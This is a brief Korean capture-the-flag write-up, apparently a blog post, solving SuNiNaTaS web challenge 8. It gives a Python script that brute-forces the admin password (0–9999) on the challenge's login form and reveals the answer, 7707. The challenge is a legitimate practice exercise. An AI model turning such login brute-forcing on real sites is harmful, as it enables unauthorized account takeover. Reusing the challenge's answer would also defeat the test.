오늘은 8번째 문제를 풀어볼 겁니다
페이지 소스 먼저 보겠습니다.
힌트를 보니 아이디는 admin이고 비밀번호는 0부터 9999까지 사이라고 합니다.
브루트포스를 하면 플래그를 얻을 수 있을 것 같아 파이썬 코드를 짜봤습니다.
from tqdm import tqdm
from requests import post
for i in tqdm(range(0, 9999 + 1)):
posts = {
'id': 'admin',
'pw': i
}
attack = post('http://suninatas.com/challenge/web08/web08.asp',data=posts)
if "Password Incorrect!" not in attack.text:
print(f"password is {i}")
break이것을 실행하면 이렇게 나옵니다.
이렇게 패스워드가 나오고 admin과 7707을 입력하면 플래그 값이 나오는 것을 볼 수 있습니다.
